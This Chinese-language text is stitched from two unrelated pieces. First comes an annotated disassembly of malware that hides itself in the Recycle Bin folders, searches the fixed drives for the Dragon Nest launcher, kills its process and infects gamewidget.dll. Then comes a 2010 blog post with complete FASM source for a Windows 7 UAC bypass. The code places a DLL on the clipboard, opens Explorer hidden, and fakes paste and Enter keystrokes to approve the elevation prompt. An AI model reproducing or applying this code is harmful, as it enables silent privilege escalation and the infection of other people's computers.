0040152E  |.  0FBE85 FCFEFF>movsx   eax, byte ptr [ebp-104]          ; |
00401535  |.  50            push    eax                              ; |<%c>
00401536  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
0040153C  |.  68 44114000   push    00401144                         ; |Format = "%c:\RECYCLER\%d.tmp"
00401541  |.  50            push    eax                              ; |s
00401542  |.  FFD7          call    edi                              ; \wsprintfA
00401544  |.  8B1D 1C104000 mov     ebx, dword ptr [<&KERNEL32.Delet>;  构造路径C:\RECYCLER\4143625.tmp
0040154A  |.  83C4 10       add     esp, 10
0040154D  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401553  |.  50            push    eax                              ; /FileName
00401554  |.  FFD3          call    ebx                              ; \DeleteFileA
00401556  |.  85C0          test    eax, eax                         ;  删除文件（如果已存在）
00401558  |.  75 30         jnz     short 0040158A
0040155A  |.  FF15 50104000 call    dword ptr [<&KERNEL32.GetLastErr>; [GetLastError
00401560  |.  83F8 03       cmp     eax, 3
00401563  |.  75 25         jnz     short 0040158A
00401565  |.  FFD6          call    esi
00401567  |.  50            push    eax                              ;  获取启动时间
00401568  |.  0FBE85 FCFEFF>movsx   eax, byte ptr [ebp-104]
0040156F  |.  50            push    eax
00401570  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401576  |.  68 30114000   push    00401130                         ;  ASCII "%c:\Recycled\%d.tmp"
0040157B  |.  50            push    eax
0040157C  |.  FFD7          call    edi                              ;  wsprintfA
0040157E  |.  83C4 10       add     esp, 10                          ;  构造C:\Recycled\4273328.tmp
00401581  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]
00401587  |.  50            push    eax
00401588  |.  FFD3          call    ebx
0040158A  |>  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ;  删除文件（如果已存在）
00401590  |.  50            push    eax                              ; /NewName
00401591  |.  8D85 FCFEFFFF lea     eax, dword ptr [ebp-104]         ; |
00401597  |.  50            push    eax                              ; |ExistingName
00401598  |.  FF15 4C104000 call    dword ptr [<&KERNEL32.MoveFileA>>; \MoveFileA
0040159E  |.  6A 04         push    4                                ; /移动自身到C:\Recycled\4273328.tmp
004015A0  |.  8D85 F8FDFFFF lea     eax, dword ptr [ebp-208]         ; |
004015A6  |.  6A 00         push    0                                ; |NewName = NULL
004015A8  |.  50            push    eax                              ; |ExistingName
004015A9  |.  FF15 14104000 call    dword ptr [<&KERNEL32.MoveFileEx>; \MoveFileExA

感染安装龙之谷的所有磁盘

[sourcode]

004018F7 |> 6A 40         /push    40
004018F9 |. |33C0          |xor     eax, eax
004018FB |. |59            |pop     ecx
004018FC |. |8DBC24 350100>|lea     edi, dword ptr [esp+135]
00401903 |. |889C24 340100>|mov     byte ptr [esp+134], bl
0040190A |. |BE 1C284000   |mov     esi, 0040281C                   ; ASCII "A:\"
0040190F |. |F3:AB         |rep     stos dword ptr es:[edi]
00401911 |. |66:AB         |stos    word ptr es:[edi]
00401913 |. |AA            |stos    byte ptr es:[edi]
00401914 |. |33FF          |xor     edi, edi
00401916 |. |381D 1C284000 |cmp     byte ptr [40281C], bl
0040191C |. |0F84 84000000 |je      004019A6
00401922 |> |56            |/push    esi                            ; /RootPathName
00401923 |. |FF15 38104000 ||call    dword ptr [<&KERNEL32.GetDrive>; \GetDriveTypeA
00401929 |. |83F8 03       ||cmp     eax, 3                         ; 获取磁盘类型
0040192C |. |75 63         ||jnz     short 00401991                 ; 判断是否为固定磁盘
0040192E |. |8D8424 340100>||lea     eax, dword ptr [esp+134]       ; 是则执行
00401935 |. |50            ||push    eax
00401936 |. |68 C8104000   ||push    004010C8                       ; ASCII "dnlauncher.exe"
0040193B |. |56            ||push    esi
0040193C |. |FF15 BC104000 ||call    dword ptr [<&dbghelp.SearchTre>; dbghelp.SearchTreeForFile
00401942 |. |85C0          ||test    eax, eax                       ; 查找是否存在dnlauncher.exe
00401944 |. |74 4B         ||je      short 00401991
00401946 |. |6A 40         ||push    40
00401948 |. |33C0          ||xor     eax, eax
0040194A |. |59            ||pop     ecx
0040194B |. |8DBC24 390200>||lea     edi, dword ptr [esp+239]
00401952 |. |889C24 380200>||mov     byte ptr [esp+238], bl
00401959 |. |53            ||push    ebx
0040195A |. |F3:AB         ||rep     stos dword ptr es:[edi]
0040195C |. |66:AB         ||stos    word ptr es:[edi]
0040195E |. |AA            ||stos    byte ptr es:[edi]
0040195F |. |8D8424 3C0200>||lea     eax, dword ptr [esp+23C]
00401966 |. |50            ||push    eax
00401967 |. |8D8424 3C0100>||lea     eax, dword ptr [esp+13C]
0040196E |. |50            ||push    eax
0040196F |. |E8 D0F8FFFF   ||call    00401244                       ; 取dnlauncher.exe的路径
00401974 |. |E8 ABF8FFFF   ||call    00401224                       ; 结束进程
00401979 |. |8D8424 440200>||lea     eax, dword ptr [esp+244]
00401980 |. |68 E8104000   ||push    004010E8                       ; ASCII "gamewidget.dll"
00401985 |. |50            ||push    eax
00401986 |. |E8 BAF9FFFF   ||call    00401345                       ; 再次感染
0040198B |. |83C4 14       ||add     esp, 14
0040198E |. |6A 01         ||push    1
00401990 |. |5F            ||pop     edi
00401991 |> |56            ||push    esi                            ; /String
00401992 |. |FF15 34104000 ||call    dword ptr [<&KERNEL32.lstrlenA>; \lstrlenA
00401998 |. |385C06 01     ||cmp     byte ptr [esi+eax+1], bl
0040199C |. |8D7406 01     ||lea     esi, dword ptr [esi+eax+1]
004019A0 |.^|75 80         |\jnz     short 00401922
004019A2 |. |3BFB          |cmp     edi, ebx
004019A4 |. |75 10         |jnz     short 004019B6
004019A6 |> |68 20BF0200   |push    2BF20                           ; /Timeout = 180000. ms
004019AB |. |FF15 44104000 |call    dword ptr [<&KERNEL32.Sleep>]   ; \Sleep
004019B1 |.^\E9 41FFFFFF   \jmp     004018F7
004019B6 |> FF35 20294000 push    dword ptr [402920]
004019BC |. E8 4D000000   call
004019C1 |. 55            push    ebp
004019C2 |. E8 F9F7FFFF   call    004011C0
004019C7 |. 59            pop     ecx
004019C8 |. 85C0          test    eax, eax
004019CA |. 59            pop     ecx
004019CB |. 75 07         jnz     short 004019D4
004019CD |. E8 16FBFFFF   call    004014E8
004019D2 |. EB 0E         jmp     short 004019E2
004019D4 |> 6A 04         push    4                                ; /Flags = DELAY_UNTIL_REBOOT
004019D6 |. 8D4424 34     lea     eax, dword ptr [esp+34]          ; |
004019DA |. 53            push    ebx                              ; |NewName
004019DB |. 50            push    eax                              ; |ExistingName
004019DC |. FF15 14104000 call    dword ptr [<&KERNEL32.MoveFileEx>; \MoveFileExA
004019E2 |> 53            push    ebx                              ; /自身移动到回收站
004019E3 |. FF15 7C104000 call    dword ptr [<&MSVCRT.exit>]       ; \exit
004019E9 |. CC            int3                                     ; 退出

[/sourcode]

Bypass Win7 Uac 实用思路转自小鱼

零度x — Wed, 04 Aug 2010 01:09:59 +0000

Hi, 伙计们最近还好不, 闷热的天气不知你是否和我一样烦躁。不过这样的天气咱们可不能糟蹋了, 所以就扔点闷热的思路吧，主题: Bypass Win7 Uac。

Win7 Uac的思路很多，但是实用的确很少。例如利用白名单机制通过IFileOperation来yy. 例如还有在很久很久以前通过DuplicateTokenEx,及CreateProcessAsUser来yy的.

恩除了白名单的利用还算可以，第二种就别提了, 已经属于….过去时了，不过最让我伤心的是，在今年的杂志上我的心灵又被悄悄的撞伤了, 一篇FireWorm的 Bypass uac的标题把我深深的吸引了，可是当我看到内容的时候，嗯，我哭了. 哭的很伤心.

唔，前言就说这么些吧，呼呼，纯属无聊的发狂. 今天咱们就来谈点实用思路吧，啥叫实用，那就是用简单的思路和方法来实现需求.恩，符合一个Vxer的思想, 自恋一下.

我们来继续正题吧.

不知道大家是否对win7 的uac进行过了解，这里我先简单的诉说一下.

(1). win7 默认系统分区的根目录是可以创建文件夹的.

(2). win7 uac 现在有自定义级别了(这有点是废话了).

(3). win7 uac默认级别我们通过交互的形式进行文件操作，你是否发现它的用户权限控制的提示窗口并不是锁死的，我们是可以操作的，呼呼，聪明家伙们似乎想到了什么, 不过这个操作我们利用资源管理器的文件操作方法的接口是没用的，为啥呢？这你就去了解我上面所说的白名单吧。

Ok, 简单了解了以上3点。我们就有对策了, 通过第三点，我们只要能模拟出真实的文件操作，那么我们就可以YY它的用户权限控制窗口。

呀？你问我啥叫真实的操作，OK, 就是平常我们通过输入设备的交互这个我们这里就把它名为真实的文件操作。那么怎么模拟呢？那就接下来直接上Demo吧，因为代码非常Easy，所以我就不对代码进行太多的解释了，相信大家都应该能看懂。

这里我给大家叙述下流程吧,：

我们先将要拷贝文件复制到剪贴板中，然后通过命令行explorer.exe c:\windows 进行隐藏打开，然后取窗口句柄，设置焦点，然后模拟ctrl+v进行复制操作，然后通过模拟enter进行允许 uac 窗口, ok 程序完成。

Demo环境hp win7 家庭高级版, UAC 默认级别

        format PE GUI 4.0

        include ‘win32ax.inc’
        include ‘system.inc’

.text

include ‘table.inc’
include ‘system\string.asm’

struct DROPFILES
  pFiles rd 1
  pt        POINT
  fNc        rd 1
  fWide        rd 1
ends

stDropFile DROPFILES
szFileName db ’d:\demo.dll’, 0

        entry        $

                invoke        GlobalAlloc, GMEM_ZEROINIT, sizeof.DROPFILES + szFileName.size  + 5
                xchg        eax, edi
                mov        dword [edi+DROPFILES.pFiles], sizeof.DROPFILES

                mov        esi, szFileName
                mov        ecx, szFileName.size
                push        edi
                add        edi, sizeof.DROPFILES
                rep        movsb
                pop        edi

                ; copy data to clipboard

                invoke        OpenClipboard, 0
                invoke        EmptyClipboard
                invoke        SetClipboardData, CF_HDROP, edi
                invoke        CloseClipboard

                ; open c:\windows

                invoke        WinExec, ‘explorer.exe c:\windows’, SW_HIDE

                ; set windows focus

                invoke        FindWindow, NULL, ‘Windows’
                xchg        eax, ebx
                invoke        SetForegroundWindow, ebx

                invoke        Sleep, 1000

                ; send ctrl + v

                invoke        keybd_event, VK_CONTROL, 0, 0, 0
                invoke        keybd_event, VK_V, 0, 0, 0
                invoke        keybd_event, VK_V, 0, KEYEVENTF_KEYUP, 0
                invoke        keybd_event, VK_CONTROL, 0, KEYEVENTF_KEYUP, 0

                ; send enter bypass uac

                invoke        keybd_event, VK_RETURN, 0, 0, 0
                invoke        keybd_event, VK_RETURN, 0, KEYEVENTF_KEYUP, 0

                invoke        ExitProcess, 0

.idata